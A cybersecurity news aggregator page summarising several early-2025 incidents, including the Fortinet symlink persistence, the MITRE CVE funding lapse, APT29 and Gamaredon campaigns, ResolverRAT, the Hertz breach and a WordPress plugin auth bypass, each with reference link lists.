CyberSecurity news

FlagThis

@cyberalerts.io //
Fortinet has issued an urgent advisory, warning customers of a new technique employed by attackers to maintain unauthorized, read-only access to FortiGate devices even after the original vulnerabilities are patched. Attackers are exploiting known FortiGate flaws such as CVE-2022-42475, CVE-2023-27997, and CVE-2024-21762. They achieve persistent access by inserting a symbolic link (symlink) that connects the user file system to the root file system.

This symlink is placed in a directory tied to the SSL-VPN language file function, allowing the attackers to bypass FortiGate patches. Despite the fact that the original vulnerabilities have been addressed, the symlink remains active, granting continuous visibility into device configurations. Devices with SSL-VPN functionality disabled are not affected. The read-only access ensures attackers cannot make direct changes, but they can still expose sensitive data.

To combat this threat, Fortinet has released targeted updates across FortiOS versions that automatically remove the symlink through antivirus detection. Changes to the SSL-VPN interface are also implemented to prevent similar abuses. Customers are strongly advised to upgrade to the latest FortiOS versions and thoroughly inspect and recover configurations, treating existing ones as potentially compromised. Security agencies have noted that related compromises may date back to early 2023, emphasizing the need for continuous monitoring, robust patch management, and proactive threat hunting.

Recommended read:
References :
  • www.cybersecuritydive.com: Fortinet warns of threat activity against older vulnerabilities
  • thehackernews.com: The Hacker News article on Fortinet Warns Attackers Retain FortiGate Access Post-Patching via SSL-VPN Symlink Exploit
  • community.fortinet.com: Technical Tip : Recommended steps to execute in case of a compromise
  • BleepingComputer: Fortinet warns that threat actors use a post-exploitation technique
  • BleepingComputer: Fortinet: Hackers retain access to patched FortiGate VPNs using symlinks
  • Help Net Security: HelpNetSecurity: FortiOS, FortiGate vulnerabilities
  • bsky.app: Fortinet warns that threat actors use a post-exploitation technique that helps them maintain read-only access to previously compromised FortiGate VPN devices even after the original attack vector was patched.
  • www.helpnetsecurity.com: Hackers exploit old FortiGate vulnerabilities, use symlink trick to retain limited access to patched devices
  • www.bleepingcomputer.com: Fortinet warns that threat actors use a post-exploitation technique that helps them maintain read-only access to previously compromised FortiGate VPN devices even after the original attack vector was patched.
  • securityaffairs.com: Fortinet warns attackers can keep read-only access to FortiGate devices even after the original vulnerability is patched.
  • bsky.app: Fortinet has urged customers to install a recent FortiGate firmware update that mitigates a new technique abused in the wild. The technique allows attackers to maintain read-only access to FortiGate devices they previously infected.
  • www.scworld.com: Fortinet warns that threat actors use a post-exploitation technique that helps them maintain read-only access to previously compromised FortiGate VPN devices even after the original attack vector was patched.
  • securityaffairs.com: Fortinet warns attackers can keep read-only access to FortiGate devices even after the original vulnerability is patched.
  • hackread.com: Fortinet Issues Fixes After Attackers Bypass Patches to Maintain Access
  • www.scworld.com: SCWorld brief on Fortinet FortiGate fixes circumvented by symlink exploit
  • The Register - Security: Old Fortinet flaws under attack with new method its patch didn't prevent
  • MSSP feed for Latest: Fortinet Finds Attackers Maintain Access Post-Patch via SSL-VPN Symlink Exploit Fortinet Finds Attackers Maintain Access Post-Patch via SSL-VPN Symlink Exploit
  • hackread.com: Fortinet Issues Fixes After Attackers Bypass Patches to Maintain Access
  • securityonline.info: Fortinet Uncovers Threat Actor Persistence via Symbolic Link Exploit in FortiGate Devices
  • ciso2ciso.com: Fortinet Issues Fixes After Attackers Bypass Patches to Maintain Access
  • securityonline.info: Fortinet Uncovers Threat Actor Persistence via Symbolic Link Exploit in FortiGate Devices
  • ciso2ciso.com: Fortinet Issues Fixes After Attackers Bypass Patches to Maintain Access – Source:hackread.com
  • Blog: Threat actors have been observed leveraging a new method to exploit a previously patched vulnerability in Fortinet’s FortiOS operating system—specifically targeting FortiGate VPN appliances. Although Fortinet issued a fix for the original flaw (CVE-2023-27997), researchers found that threat actors can still gain access by manipulating symbolic links (symlinks) during the device’s boot process.
  • BleepingComputer: Over 16,000 internet-exposed Fortinet devices have been detected as compromised with a new symlink backdoor that allows read-only access to sensitive files on previously compromised devices.
  • bsky.app: Over 16,000 internet-exposed Fortinet devices have been detected as compromised with a new symlink backdoor that allows read-only access to sensitive files on previously compromised devices.

info@thehackernews.com (The@The Hacker News //
The cybersecurity world is on edge as MITRE, the organization behind the Common Vulnerabilities and Exposures (CVE) program, faces a potential shutdown of the program due to expiring funding from the Department of Homeland Security (DHS). The CVE program is a cornerstone of global vulnerability management, providing a standardized system for identifying and tracking software flaws. This system allows companies, governments, and researchers to share information and coordinate their efforts to address cybersecurity risks.

A lapse in funding for the CVE program would have dire consequences for the cybersecurity landscape. Without a universal framework for tracking software flaws, coordinated disclosures across vendors and governments would become significantly more challenging. This breakdown in coordination would create chaos and uncertainty in vulnerability management, making it harder for organizations to protect themselves against cyberattacks. The potential shutdown of the CVE program is not just a tech industry issue, but a matter of national security.

According to Gary Miliefsky, publisher of Cyber Defense Magazine and a former advisory board member to the CVE/OVAL initiatives, MITRE has confirmed that funding for the CVE and CWE programs will expire on April 16, 2025. While historical CVE records will remain accessible on GitHub, active development, modernization, and oversight of the CVE and CWE systems are now at risk. MITRE has expressed its commitment to CVE as a global resource, but without adequate funding, the future of this essential cybersecurity tool remains uncertain.

Recommended read:
References :
  • Cyber Defense Magazine: MITRE CVE Program in Jeopardy
  • Tony Bradley: Cybersecurity World On Edge As CVE Program Prepares To Go Dark
  • Lukasz Olejnik: By cutting what amounts to penny costs, the Trump administration will effectively (temporarily) cripple the global cybersecurity system — CVE. It is a global system for identifying and tracking vulnerabilities that has served as a common language for companies, governments, and researchers worldwide since 1999. The consequence will be a breakdown in coordination between vendors, analysts, and defense systems — no one will be certain they are referring to the same vulnerability. Total chaos.
  • RootWyrm ??:progress:: people, THIS is big and you need it in front of management RIGHT NOW. MITRE has informed the CVE board members that effective TONIGHT, funding to run CVE and CWE is effectively gone. The US federal government contracts MITRE to run these programs including both management, operations, and infrastructure. This not only could but almost certainly will result in disruptions to CVE and CWE including a halt of all operations if new contracts/funding are not secured.
  • Lukasz Olejnik: Farewell, CVE? What's next for cybersecurity?
  • bsky.app: By cutting what amounts to penny costs, the Trump administration will effectively (at least temporarily) cripple the global cybersecurity system — CVE.
  • Tenable Blog: MITRE CVE Program Funding Set To Expire
  • Jon Greig: CISA confirmed on Wednesday evening that will no longer be running the program as of tomorrow It is unclear whether they will find a new vendor or try to run it themselves.
  • www.csoonline.com: In a stunning development that demolishes a cornerstone of cybersecurity defense, nonprofit R&D organization MITRE said that its contract with the Department of Homeland Security (DHS) to maintain the Common Vulnerabilities and Exposures (CVE) database, which organizes computer vulnerabilities, will expire at midnight on April 16.
  • The Register - Security: Uncle Sam abruptly turns off funding for CVE program. Yes, that CVE program
  • securityonline.info: MITRE Warns of CVE Program Disruption as U.S. Contract Set to Expire
  • PCMag UK security: Nonprofit That Tracks Software Flaws in Jeopardy Following Funding Cuts
  • Metacurity: Here's my piece on the ending of the CVE contract. "Sasha Romanosky, senior policy researcher at the Rand Corporation, branded the end to the CVE program as 'tragic,' a sentiment echoed by many cybersecurity and CVE experts reached for comment."
  • www.nextgov.com: MITRE-backed cyber vulnerability program to lose funding Wednesday
  • x.com: Post discussing MITRE support for the CVE program expiring
  • www.cyberdefensemagazine.com: MITRE CVE Program in Jeopardy
  • securityonline.info: MITRE Warns of CVE Program Disruption as U.S. Contract Set to Expire
  • securityboulevard.com: MITRE CVE Program Funding Set To Expire
  • The Hacker News: U.S. Govt. Funding for MITRE's CVE Ends April 16, Cybersecurity Community on Alert
  • krebsonsecurity.com: A Krebs on Security article discussing the funding expiration for the CVE program.
  • Secure Bulletin: MITRE Signals Critical Risk to CVE Program as Federal Funding Expires
  • www.scworld.com: MITRE support expires for 'pillar of cybersecurity industry,' CVE program
  • cybersecuritynews.com: MITRE’s Support for CVE Program Expired Today! – Internal Letter Leaked Online, “MITRE Confirmedâ€
  • Risky Business Media: Risky Bulletin: MITRE says funding risk could disrupt CVE database
  • Sergiu Gatlan: This comes after MITRE Vice President Yosry Barsoum warned on Tuesday that U.S. government funding for the Common Vulnerabilities and Exposures (CVE) and Common Weakness Enumeration (CWE) programs expires today.
  • The Last Watchdog: MY TAKE: The CVE program crisis isn’t over — it’s a wake-up call for cybersecurity’s supply chain
  • Schneier on Security: Mitre’s CVE’s program—which provides common naming and other informational resources about cybersecurity vulnerabilities—was about to , as the US Department of Homeland Security failed to renew the contact.
  • industrialcyber.co: US CISA extends MITRE CVE, CWE programs with last-minute contract extension, prevents shutdown
  • PCMag UK security: 11th-Hour Funding Saves Program That Tracks Software Vulnerabilities
  • Industrial Cyber: MITRE warns of potential cybersecurity disruptions as US government funding for CVE, CWE programs set to expire
  • hackread.com: CVE Program Stays Online as CISA Backs Temporary MITRE Extension
  • industrialcyber.co: Non-profit organization MITRE has informed that federal government funding for the Common Vulnerabilities and Exposures (CVE) and Common...
  • securebulletin.com: The cybersecurity world faces a significant challenge as the Common Vulnerabilities and Exposures (CVE) program, a cornerstone of global vulnerability management, risks disruption due to expiring federal funding.
  • Security Risk Advisors: Funding for MITRE’s CVE Program Set to Expire, Global Vulnerability Tracking at Risk
  • The DefendOps Diaries: CISA extends funding for CVE program, boosting global cybersecurity collaboration and threat management.
  • www.lastwatchdog.com: MY TAKE: The CVE program crisis isn’t over — it’s a wake-up call for cybersecurity’s supply chain

Pierluigi Paganini@Security Affairs //
The Russia-linked cyber espionage group Shuckworm, also known as Gamaredon or Armageddon, is actively targeting a Western country's military mission based in Ukraine. The campaign, which began in February 2025 and continued through March, involves the deployment of an updated, PowerShell-based version of its GammaSteel infostealer malware. This latest wave of activity underscores Shuckworm's persistent focus on Ukrainian targets, with the group believed to be operating on behalf of Russia's Federal Security Service (FSB). They have historically concentrated their efforts on government, military, and law enforcement targets in Ukraine.

The initial infection vector in this campaign appears to be infected removable drives. Evidence from the Windows Registry's UserAssist key suggests that the infection was triggered from such an external drive. The attack chain is multi-staged and designed to minimize detection. It involves the execution of obfuscated VBScript and PowerShell scripts stored in the registry. This shift towards PowerShell-based tools allows Shuckworm to improve obfuscation and store scripts directly within the Windows Registry, making file-based detection more challenging.

GammaSteel, the malware deployed in this campaign, now has enhanced reconnaissance features. It is capable of capturing screenshots, gathering system information, and enumerating desktop contents and user documents. The malware targets specific file types such as documents, spreadsheets, and PDFs. Shuckworm's exfiltration methods have also become more sophisticated, utilizing PowerShell web requests or cURL with Tor proxies to extract sensitive data stealthily. This campaign demonstrates an increase in sophistication for Shuckworm, with the group leveraging legitimate web services to lower the risk of detection.

Recommended read:
References :
  • bsky.app: The Russian state-backed hacking group Gamaredon (aka "Shuckworm") has been targeting a military mission of a Western country in Ukraine in attacks likely deployed from removable drives.
  • cyberpress.org: Shuckworm Deploys PowerShell-Based GammaSteel Malware in Precision Attacks
  • gbhackers.com: Shuckworm Group Leverages GammaSteel Malware in Targeted PowerShell Attacks
  • The Hacker News: Shuckworm targets Western military mission
  • Broadcom Software Blogs: Shuckworm Targets Foreign Military Mission Based in Ukraine
  • gbhackers.com: The Russia-linked cyber-espionage group known as Shuckworm (also identified as Gamaredon or Armageddon) has been observed targeting a Western country’s military mission located within Ukraine, employing an updated, PowerShell-based version of its GammaSteel infostealer malware.
  • securityonline.info: Russia-linked espionage group Shuckworm (also known as Gamaredon or Armageddon) has launched a renewed and more sophisticated cyber campaign targeting a foreign military mission based in Ukraine, according to a detailed report by the Symantec Threat Hunter Team. This latest wave of activity, which began in February 2025 and continued through March, underscores Shuckworm’s relentless […]
  • BleepingComputer: The Russian state-backed hacking group Gamaredon (aka "Shuckworm") has been targeting a military mission of a Western country in Ukraine in attacks likely deployed from removable drives. [...]
  • securityonline.info: Shuckworm’s Sophisticated Cyber Campaign Targets Ukraine Military Mission
  • Cyber Security News: Shuckworm Deploys PowerShell-Based GammaSteel Malware in Precision Attacks
  • The Hacker News: Gamaredon Uses Infected Removable Drives to Breach Western Military Mission in Ukraine
  • www.bleepingcomputer.com: Russian hackers attack Western military mission using malicious drive
  • www.csoonline.com: Russian Shuckworm APT is back with updated GammaSteel malware
  • securityaffairs.com: Gamaredon targeted the military mission of a Western country based in Ukraine
  • The DefendOps Diaries: Explore Gamaredon's evolving cyber tactics targeting Western military missions with advanced evasion techniques and PowerShell tools.
  • www.sentinelone.com: Police arrest SmokeLoader malware customers, AkiraBot abuses AI to bypass CAPTCHAs, and Gamaredon delivers GammaSteel via infected drives.
  • PCMag UK security: A suspected state-sponsored Russian group may have developed the 'GammaSteel' attack to help them spy on and steal data from a military mission in Ukraine. A malware-laden storage drive may have helped Russia spy on military activities in Ukraine.
  • www.scworld.com: Infected removable drives were used to spread the malware.
  • Metacurity: Cybersecurity industry is mum on SentinelOne EO, Comptroller of the Currency lacked MFA on hacked email account, Morocco confirms massive cyber attack, Gamaredon is targeting Western military mission in Ukraine, Ethical hacker stole $2.6m from Morpho Labs, Sex chatbots leak information, much more
  • www.metacurity.com: Cybersecurity industry is mum on SentinelOne EO, Comptroller of the Currency lacked MFA on hacked email account, Morocco confirms massive cyber attack, Gamaredon is targeting Western military mission in Ukraine, Ethical hacker stole $2.6m from Morpho Labs, Sex chatbots leak information, much more
  • ciso2ciso.com: Gamaredon Uses Infected Removable Drives to Breach Western Military Mission in Ukraine – Source:thehackernews.com
  • ciso2ciso.com: The group targeted the military mission of a Western country, per the report. Infected removable drives have been used by the group.
  • Metacurity: Before you head out for a much-deserved weekend break after this insane week, check out today's Metacurity for the most critical infosec developments you should know, including --China acknowledged US cyberattacks at a secret meeting, report --Cybersecurity industry is mum on SentinelOne EO, --Comptroller of the Currency lacked MFA on hacked email account, --Morocco confirms massive cyber attack, --Gamaredon is targeting Western military mission in Ukraine, --Ethical hacker stole $2.6m from Morpho Labs, --Sex chatbots leak information, --much more
  • Security Risk Advisors: 🚩Shuckworm Compromises Western Military Mission in Ukraine Using Updated PowerShell GammaSteel Malware
  • Security Latest: For the past decade, this group of FSB hackers—including “traitorâ€Â Ukrainian intelligence officers—has used a grinding barrage of intrusion campaigns to make life hell for their former countrymen and cybersecurity defenders.

ross.kelly@futurenet.com (Ross@Latest from ITPro //
Hertz Corporation has announced a data breach affecting customers of its Hertz, Thrifty, and Dollar car rental brands. The breach stems from the exploitation of Cleo zero-day vulnerabilities in late 2024. Customer data, including personal information and driver's licenses, was stolen. The company confirmed the breach on February 10, 2025, stating that an unauthorized third party acquired Hertz data by exploiting vulnerabilities within Cleo's platform in October and December 2024.

The stolen data varies depending on the region, but generally includes customer names, dates of birth, contact information, driver's licenses, payment card information, and workers' compensation claims. In some instances, Social Security numbers and other government-issued identification numbers were also compromised. Notices about the breach have been posted on Hertz websites for customers in Australia, Canada, the European Union, New Zealand, the United Kingdom, and several U.S. states, including California, Maine, and Texas. Hertz has disclosed that at least 3,400 customers in Maine and some 96,665 customers in Texas were affected.

The company attributed the breach to vulnerabilities in Cleo's software, which was targeted by the Clop ransomware gang in 2024. This breach highlights the significant cybersecurity risks associated with third-party vendors and the potential for mass data theft. It is another example of the widespread consequences that can occur from zero-day exploits in widely used enterprise file transfer products. Those affected have been advised to take precautions to protect their personal and financial information.

Recommended read:
References :
  • securityaffairs.com: Hertz disclosed a data breach following 2024 Cleo zero-day attack
  • techcrunch.com: Hertz says customers’ personal data and driver’s licenses stolen in data breach
  • The DefendOps Diaries: Hertz Data Breach: Lessons in Cybersecurity and Vendor Management
  • www.bleepingcomputer.com: Hertz confirms customer info, drivers' licenses stolen in data breach
  • Zack Whittaker: New by me: Car rental giant Hertz has confirmed a data breach affecting customers' personal information, driver's licenses, and payment card data. Customers worldwide are being notified.
  • techcrunch.com: Hertz says customers' personal data and driver's licenses stolen in data breach
  • BleepingComputer: Car rental giant Hertz Corporation warns it suffered a data breach after customer data for its Hertz, Thrifty, and Dollar brands was stolen in the Cleo zero-day data theft attacks.
  • www.itpro.com: Cleo attack victim list grows as Hertz confirms customer data stolen – and security experts say it won't be the last
  • Malwarebytes: Hertz data breach caused by CL0P ransomware attack on vendor Cleo
  • PCMag UK security: Hackers Stole Credit Card, Driver's License Info in Hertz Data Breach
  • Zack Whittaker: Hertz won't say how many are affected by its breach, but continues to notify U.S. states, giving a little indication of the numbers. Per its filing in Texas today, Hertz said 96,665 Texas residents are affected. Plus 3,400 people in Maine and that's already 100,000+ people in two states alone.
  • www.cybersecuritydive.com: Hertz says personal data breached in connection with Cleo file-transfer flaws
  • ComputerWeekly.com: Hertz warns UK customers of Cleo-linked data breach
  • The Register - Security: Where it Hertz: Customer data driven off in Cleo attacks
  • cyberinsider.com: Hertz Confirms Data Breach Following Clop Ransomware Leaks
  • cyberinsider.com: Analysis of how the Clop ransomware group exploited zero-day vulnerabilities to compromise Hertz's systems
  • Help Net Security: Car rental company Hertz suffers a data breach from exploitation of vulnerabilities in third-party software.

@www.wsj.com //
References: Sam Bent , DataBreaches.Net , WIRED ...
China has reportedly acknowledged its role in cyberattacks against U.S. critical infrastructure, specifically those attributed to the Volt Typhoon campaign. This admission occurred during a secret meeting with U.S. officials in December, according to SecurityWeek. U.S. officials noted that Volt Typhoon's actions, which involved infiltrating various industries' systems through zero-day exploits and other advanced tactics, were an attempt to deter U.S. support for Taiwan. Furthermore, cyberespionage by the Chinese state-backed Salt Typhoon group against U.S. telecommunications firms was also discussed, revealing the compromise of U.S. officials' communications.

These attacks are part of a broader pattern of Chinese state-backed hackers increasing their activity against infrastructure in the U.S., Europe, and the Asia-Pacific region. Recent intelligence indicates groups like Volt Typhoon and Salt Typhoon have infiltrated power grids, telecommunications networks, and transportation systems. Their apparent goal is to preposition for potential wartime disruption or coercive retaliation during periods of geopolitical tension. This approach involves installing dormant "logic bombs" designed to be triggered during a conflict or crisis, maintaining persistent access while minimizing detection risk.

The intensified cyber activities are viewed as a component of China's cyber-enabled irregular warfare strategy. Recent incidents include a power grid failure in Taiwan linked to a Volt Typhoon logic bomb, along with similar occurrences reported in European infrastructure. The attacks' sophistication lies in their "Living Off the Land" techniques, blending state-sponsored hacking with proxy groups and disinformation to achieve strategic objectives without triggering conventional military responses. Such actions, as analyzed by IT security professional Simone Kraus, raise concerns due to their potential for devastating real-world consequences if critical infrastructure is compromised.

Recommended read:
References :
  • Sam Bent: In a closed-door Geneva summit, Chinese officials admitted—albeit indirectly—to orchestrating Volt Typhoon cyberattacks on US infrastructure. The move signals escalating covert conflict over Taiwan and exposes the US grid’s vulnerability to prolonged foreign infiltration.
  • DataBreaches.Net: Chinese officials acknowledged in a secret December meeting that Beijing was behind a widespread series of alarming cyberattacks on U.S. infrastructure, according to people familiar with the matter, underscoring how hostilities between the two superpowers are continuing to escalate.
  • www.metacurity.com: China acknowledged US cyberattacks at a secret meeting, report
  • WIRED: China Secretly (and Weirdly) Admits It Hacked US Infrastructure
  • Risky Business Media: China privately admits to hacking American critical infrastructure, the US Treasury was compromised by password spraying, America will sign a global spyware agreement after all, and a Chinese APT is abusing the Windows Sandbox to hide its malware.
  • securityaffairs.com: China admitted its role in Volt Typhoon cyberattacks on U.S. infrastructure, WSJ reports.
  • The Register - Security: China reportedly admitted directing cyberattacks on US infrastructure at a meeting with their American counterparts, according to The Wall Street Journal.…
  • Schneier on Security: China Sort of Admits to Being Behind Volt Typhoon
  • oodaloop.com: China Admitted to Volt Typhoon Cyberattacks on US Critical Infrastructure: Report
  • www.scworld.com: US critical infrastructure attacks reportedly acknowledged by China
  • OODAloop: In a secret meeting that took place late last year between Chinese and American officials, the former confirmed that China had conducted cyberattacks against US infrastructure as part of the campaign known as Volt Typhoon, according to The Wall Street Journal.
  • cybersecuritynews.com: Chinese Hackers Attacking Critical Infrastructure to Sabotage Networks
  • Metacurity: China acknowledged US cyberattacks at a secret meeting, report
  • ciso2ciso.com: China Sort of Admits to Being Behind Volt Typhoon – Source: www.schneier.com
  • WIRED: Brass Typhoon: The Chinese Hacking Group Lurking in the Shadows

@cyberpress.org //
Russian state-sponsored espionage group Midnight Blizzard, also known as APT29 or Cozy Bear, is conducting a spear-phishing campaign targeting European diplomatic organizations. Check Point Research has been observing this sophisticated operation, which began in January 2025 and employs advanced techniques to target government officials and diplomats across Europe. The threat actors are impersonating a major European foreign affairs ministry to send deceptive emails inviting targets to wine-tasting events. This campaign, leveraging custom malware, aims to compromise diplomatic entities, including embassies of non-European countries.

The campaign introduces a previously unseen malware loader called GrapeLoader, along with a new variant of the Wineloader backdoor. The phishing emails, sent from domains like 'bakenhof[.]com' or 'silry[.]com,' contain malicious links that, under specific conditions, initiate the download of a ZIP archive named 'wine.zip'. If the targeting conditions are not met, victims are redirected to the legitimate website of the impersonated ministry, reducing suspicion. This mirrors a previous Wineloader campaign, indicating a continued focus on European diplomacy by APT29.

Once executed via DLL sideloading, GrapeLoader collects host information, establishes persistence by modifying the Windows Registry, and contacts a command-and-control server. The use of in-memory execution is an advanced evasion technique to complicate detection. The objective of the campaign is likely espionage, given APT29's history of targeting high-profile organizations, including government agencies and think tanks, and its association with the SolarWinds supply chain attack.

Recommended read:
References :
  • Check Point Blog: Check Point Research has been observing a sophisticated phishing campaign conducted by Advanced Persistent Threat (APT) 29, a Russian-linked threat group.
  • BleepingComputer: Russian state-sponsored espionage group Midnight Blizzard is behind a new spear-phishing campaign targeting diplomatic entities in Europe, including embassies.
  • bsky.app: Midnight Blizzard deploys new GrapeLoader malware in embassy phishing
  • blog.checkpoint.com: Unmasking APT29: The Sophisticated Phishing Campaign Targeting European Diplomacy
  • cyberpress.org: Detailed report about APT29's GRAPELOADER campaign targeting European diplomats.
  • research.checkpoint.com: Renewed APT29 Phishing Campaign Against European Diplomats
  • Cyber Security News: APT29 Hackers Deploy GRAPELOADER in Latest Attack on European Diplomats
  • The Register - Security: Russians lure European diplomats into malware trap with wine-tasting invite
  • iHLS: Russian Phishing Campaign Steals Sensitive Data in European Government Networks
  • cybersecuritynews.com: APT29 Hackers Deploy GRAPELOADER in Latest Attack on European Diplomats
  • www.scworld.com: New APT29 spear-phishing campaign targets European diplomatic organizations
  • www.helpnetsecurity.com: Cozy Bear targets EU diplomats with wine-tasting invites (again)
  • Check Point Research: Renewed APT29 Phishing Campaign Against European Diplomats
  • Help Net Security: Detailed report on the campaign's tactics, techniques, and procedures, including the use of fake wine-tasting invitations.
  • securityonline.info: SecurityOnline: APT29 Targets European Diplomats with Wine-Themed Phishing
  • securityonline.info: APT29 Targets European Diplomats with Wine-Themed Phishing
  • www.csoonline.com: The tactics, techniques, and procedures (TTPs) observed in this campaign bear strong similarities to those seen in the previous WINELOADER campaign from March 2024, The report contains indicators of compromise such as file names, file hashes and C2 URLs that can be used by security teams to build detections and threat hunting queries.

Pierluigi Paganini@securityaffairs.com //
A newly discovered remote access trojan (RAT) called ResolverRAT is actively targeting healthcare and pharmaceutical organizations worldwide. Security researchers at Morphisec have identified this sophisticated malware as a new threat, noting its advanced in-memory execution, API and resource resolution at runtime, and layered evasion techniques. ResolverRAT is designed for stealth and resilience, making static and behavioral analysis significantly more difficult. The malware has been observed in attacks as recently as March 10, indicating an ongoing campaign.

ResolverRAT spreads through meticulously crafted phishing emails, often employing fear-based lures to pressure recipients into clicking malicious links. These emails are localized, using languages spoken in targeted countries, including Hindi, Italian, Czech, Turkish, Portuguese, and Indonesian. The content often revolves around legal investigations or copyright violations to induce a sense of urgency. The infection chain initiates through DLL side-loading, with a legitimate executable used to inject ResolverRAT into memory, a technique previously observed in Rhadamanthys malware attacks.

Once deployed, ResolverRAT utilizes a multi-stage bootstrapping process engineered for stealth. The malware employs encryption and compression and exists only in memory after decryption to prevent static analysis. It also incorporates redundant persistence methods via the Windows Registry and file system. Furthermore, ResolverRAT uses a bespoke certificate-based authentication to communicate with its command-and-control (C2) server, bypassing machine root authorities and implementing an IP rotation system to connect to alternate C2 servers if necessary. These advanced C2 infrastructure capabilities indicate a sophisticated threat actor combining secure communications and fallback mechanisms.

Recommended read:
References :
  • securityaffairs.com: SecurityAffairs: New malware ‘ResolverRAT’ targets healthcare, pharmaceutical firms
  • The Hacker News: The Hacker News: ResolverRAT Campaign Targets Healthcare, Pharma via Phishing and DLL Side-Loading
  • BleepingComputer: BleepingComputer: New ResolverRAT malware targets pharma and healthcare orgs worldwide
  • ciso2ciso.com: New malware ‘ResolverRAT’ targets healthcare, pharmaceutical firms – Source: securityaffairs.com
  • ciso2ciso.com: New malware ‘ResolverRAT’ targets healthcare, pharmaceutical firms – Source: securityaffairs.com
  • bsky.app: A new remote access trojan (RAT) called 'ResolverRAT' is being used against organizations globally, with the malware used in recent attacks targeting the healthcare and pharmaceutical sectors.
  • Anonymous ???????? :af:: ResolverRAT is hitting healthcare and pharma sectors hard — phishing, fear-bait, stealth attacks.
  • industrialcyber.co: ResolverRAT malware attacks pharma and healthcare organizations via phishing and DLL side-loading
  • Industrial Cyber: ResolverRAT malware attacks pharma and healthcare organizations via phishing and DLL side-loading
  • www.scworld.com: Novel ResolverRAT trojan launched in global attacks against healthcare, pharma
  • Tech Monitor: Researchers identify new ResolverRAT cyber threat affecting global healthcare organisations
  • Security Risk Advisors: 🚩 ResolverRAT Malware Campaign Targets Healthcare and Pharmaceutical Sectors
  • www.morphisec.com: ResolverRAT Malware Campaign Targets Healthcare and Pharmaceutical Sectors
  • www.csoonline.com: New ResolverRAT malware targets healthcare and pharma orgs worldwide

@securityonline.info //
A critical security vulnerability, identified as CVE-2025-3102, has been discovered in the SureTriggers WordPress plugin, a widely used automation tool active on over 100,000 websites. The flaw allows attackers to bypass authentication and create administrator accounts, potentially leading to complete site takeover. Security researchers disclosed that the vulnerability stems from a missing empty value check in the plugin's `authenticate_user()` function, specifically affecting versions up to 1.0.78.

This vulnerability is particularly dangerous when the SureTriggers plugin is installed but not yet configured with a valid API key. In this state, an attacker can send requests with a blank secret key, tricking the plugin into granting access to sensitive REST API functions, including the ability to create new admin accounts. Exploiting this flaw could enable malicious actors to upload malicious themes or plugins, inject spam, redirect site visitors, and establish persistent backdoors, ultimately gaining full control of the affected WordPress site.

WordPress site owners are strongly urged to immediately update to SureTriggers version 1.0.79, which includes a patch for the vulnerability. Users should also review their WordPress user lists for any unfamiliar administrator accounts and ensure that all API-driven plugins have their keys properly configured and stored securely. Within hours of the public disclosure, hackers began actively exploiting the flaw, creating bogus administrator accounts. The attack attempts have originated from two different IP addresses - 2a01:e5c0:3167::2 (IPv6) 89.169.15.201 (IPv4).

Recommended read:
References :
  • securityonline.info: SureTriggers Vulnerability Exposes 100,000+ WordPress Sites to Admin Takeover
  • BleepingComputer: Hackers started exploiting a high-severity flaw that allows bypassing authentication in the OttoKit (formerly SureTriggers) plugin for WordPress just hours after public disclosure.
  • thecyberexpress.com: 100,000+ WordPress Sites at Risk as SureTriggers Exploit Goes Live
  • bsky.app: Bsky post on Hackers exploit WordPress plugin auth bypass hours after disclosure
  • www.scworld.com: Immediate exploitation of high-severity WordPress plugin flaw reported
  • securityonline.info: SureTriggers Vulnerability Exposes 100,000+ WordPress Sites to Admin Takeover
  • gbhackers.com: GBHackers article on WordPress Plugin Rogue Account‑Creation Flaw Leaves 100 K WordPress Sites Exposed.
  • Cyber Security News: Rogue User‑Creation Bug Exposes 100,000 WordPress Sites to Takeover
  • thehackernews.com: OttoKit WordPress Plugin Admin Creation Vulnerability Under Active Exploitation
  • gbhackers.com: A severe vulnerability has been uncovered in the SureTriggers WordPress plugin, which could leave over 100,000 websites at risk. The issue, discovered by security researcher mikemyers, allows attackers to create rogue administrative users on sites where the plugin is not properly configured.
  • securityaffairs.com: Attackers are exploiting recently disclosed OttoKit WordPress plugin flaw
  • ciso2ciso.com: Attackers are actively exploiting a vulnerability in the OttoKit (formerly SureTriggers) WordPress plugin, with many websites potentially exposed to complete compromise.
  • Security Risk Advisors: Critical Authentication Bypass in WordPress SureTriggers Plugin Leads to Admin Account Creation

@learn.microsoft.com //
Microsoft is alerting IT administrators to a significant issue affecting Windows Server 2025 domain controllers (DCs). After a restart, these DCs may experience a loss of network connectivity due to the servers loading the standard firewall profile instead of the domain firewall profile. This problem can render the domain controllers inaccessible on the network, disrupting Active Directory (AD) environments and potentially causing applications and services running on those servers or remote devices to fail or remain unreachable. The issue primarily impacts systems running the Active Directory Domain Services role on Windows Server 2025, with no client systems or earlier server versions affected.

This problem arises from the domain controllers failing to apply the correct network profile after a reboot, instead defaulting to a "Public" or standard firewall profile rather than the required "Domain Authenticated" profile. This misconfiguration can lead to ports and protocols that should be restricted by the domain firewall profile remaining open, posing potential security risks. Essential AD functions like Group Policy application, replication, and authentication are also disrupted, further compounding the problem for organizations relying on Active Directory for network management.

While Microsoft is actively working on a permanent fix for this issue, which is expected to be included in a future update, they have provided a temporary workaround for affected systems. Administrators can manually restart the network adapter on the affected servers using PowerShell with the command 'Restart-NetAdapter *'. However, because the issue reoccurs after each system restart, this workaround must be applied repeatedly. To streamline this process, Microsoft suggests creating a scheduled task that automatically restarts the network adapter each time the domain controller reboots.

Recommended read:
References :
  • Techzine Global: Emergency Windows update solves Active Directory problem Microsoft is launching emergency patches to correctly display local audit logon policies in Active Directory Group Policy.
  • bsky.app: Microsoft has released emergency Windows updates to address a known issue affecting local audit logon policies in Active Directory Group Policy. https://www.bleepingcomputer.com/news/microsoft/microsoft-new-emergency-windows-updates-fix-ad-policy-issues/
  • BleepingComputer: Microsoft: New Windows updates fix Active Directory policy issues Microsoft has released emergency Windows updates to address a known issue affecting local audit logon policies in Active Directory Group Policy.
  • Cyber Security News: Windows Server 2025 Restart Bug Breaks Connection with Active Directory Domain Controller
  • www.networkworld.com: Windows Server 2025 domain controllers may lose connectivity after reboot, says Microsoft
  • cybersecuritynews.com: Windows Server 2025 Restart Bug Breaks Connection with Active Directory Domain Controller
  • BleepingComputer: Microsoft: Windows Server 2025 restarts break connectivity on some DCs
  • Techzine Global: Microsoft warns that Windows Server 2025 domain controllers may become inaccessible after a restart. Affected servers load the default firewall profile instead of the domain firewall profile, interrupting applications and services.

Dissent@DataBreaches.Net //
